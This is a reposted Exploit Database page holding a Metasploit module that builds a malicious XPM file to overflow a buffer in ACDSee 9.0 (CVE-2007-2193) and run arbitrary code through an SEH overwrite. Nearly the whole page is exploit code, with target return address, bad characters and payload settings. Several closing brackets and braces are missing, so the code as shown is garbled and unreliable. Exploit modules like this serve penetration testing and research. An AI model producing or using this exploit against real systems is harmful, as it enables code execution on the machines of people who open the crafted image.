ACDSee – ‘.XPM’ File Section Buffer Overflow (Metasploit)

Exploit Database
120 阅读

作者： Metasploit

日期： 2010-09-25
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/16632/

# $Id: acdsee_xpm.rb 10477 2010-09-25 11:59:02Z mc $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GoodRanking

include Msf::Exploit::FILEFORMAT

include Msf::Exploit::Remote::Seh

def initialize(info = {})

super(update_info(info,

'Name' => 'ACDSee XPM File Section Buffer Overflow',

'Description'=> %q{

This module exploits a buffer overflow in ACDSee 9.0.

When viewing a malicious XPM file with the ACDSee product,

a remote attacker could overflow a buffer and execute

arbitrary code.

'License'=> MSF_LICENSE,

'Author' => 'MC',

'Version'=> '$Revision: 10477 $',

'References' =>

[

[ 'CVE', '2007-2193' ],

[ 'OSVDB', '35236' ],

[ 'BID', '23620' ],

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'DisablePayloadHandler' => 'true',

'Payload'=>

{

'Space'=> 750,

'BadChars' => "\x00",

'StackAdjustment' => -3500,

'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

'DisableNops' =>'True',

'Platform' => 'win',

'Targets'=>

[

[ 'ACDSee 9.0 (Build 1008)', { 'Ret' => 0x10020758 } ],

'Privileged' => false,

'DisclosureDate' => 'Nov 23 2007',

'DefaultTarget'=> 0))

register_options(

[

OptString.new('FILENAME', [ true, 'The file name.','msf.xpm']),

], self.class)

end

def exploit

filler = rand_text_alpha_upper(rand(25) + 1)

# http://www.fileformat.info/format/xpm/

head ="/* XPM */\r\n"

head << "static char * #{filler}[] = {\r\n"

head << "\""

buff =rand_text_alpha_upper(4200) + generate_seh_payload(target.ret)

foot ="\",\r\n" + "};\r\n"

xpm = head + buff + foot

print_status("Creating '#{datastore['FILENAME']}' file ...")

file_create(xpm)

end